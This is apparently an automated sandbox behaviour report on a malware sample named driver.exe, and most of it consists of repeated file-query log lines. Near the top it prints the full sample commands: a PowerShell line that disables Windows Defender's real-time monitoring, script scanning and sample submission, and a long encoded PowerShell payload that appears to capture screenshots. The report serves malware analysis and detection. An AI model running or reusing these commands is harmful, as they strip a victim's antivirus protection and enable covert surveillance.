              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiaJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75428B340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,77_2_00007FF75428B340
              Source: C:\Users\user\Desktop\driver.exeCode function: 0_2_00007FF6A29D95E0 cpuid 0_2_00007FF6A29D95E0
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\ucrtbase.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\_ctypes.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\_lzma.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\_bz2.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\_sqlite3.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\_socket.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\select.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\_ssl.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\_hashlib.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
